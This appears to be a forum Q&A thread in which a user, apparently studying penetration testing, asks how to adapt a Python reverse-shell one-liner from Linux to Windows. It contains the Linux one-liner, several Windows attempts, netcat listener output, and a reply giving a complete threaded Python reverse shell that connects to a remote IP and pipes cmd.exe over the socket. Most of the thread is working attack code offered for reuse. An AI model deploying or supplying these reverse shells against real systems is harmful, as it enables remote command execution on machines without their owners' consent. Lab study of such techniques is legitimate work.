Can anyone help me on a Python reverse shell one-liner for Windows (has to be windows one-liner).
I am trying to modify the one for Linux which I have used many times but this is my first time for Windows.
Linux one liner :
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Taken from Reverse Shell Cheat Sheet.
So here is what I have been able to do so far:
C:\Python26\python.exe -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.11.0.232',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['C:\\WINDOWS\\system32\\cmd.exe','-i']);"
Well, the thing is I do get a connection back just that the shell dies. Anyone knows how to fix this or offer some suggestions?
nc -lvnp 443
listening on [any] 443 ...
connect to [10.11.0.232] from (UNKNOWN) [10.11.1.31] 1036
So the parameter to subprocess call
must be wrong. I can't seem to get it right.
The path to cmd.exe
is correct. I can't see any corresponding parameter like -i
in the cmd man page.
Can anyone point me in the correct direction, please?
EDIT: Tried without arguments to subprocess call but still the same result. The connection dies immediately.
C:\Python26\python.exe -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.11.0.232',443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['C:\WINDOWS\system32\cmd.exe']);"
(@rockstar: I think you and I are studying the same thing!)
Not a one liner, but learning from David Cullen's answer, I put together this reverse shell for Windows.
import os,socket,subprocess,threading;
def s2p(s, p):
while True:
data = s.recv(1024)
if len(data) > 0:
p.stdin.write(data)
p.stdin.flush()
def p2s(s, p):
while True:
s.send(p.stdout.read(1))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.11.0.37",4444))
p=subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()
p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()
try:
p.wait()
except KeyboardInterrupt:
s.close()
If anybody can condense this down to a single line, please feel free to edit my post or adapt this into your own answer...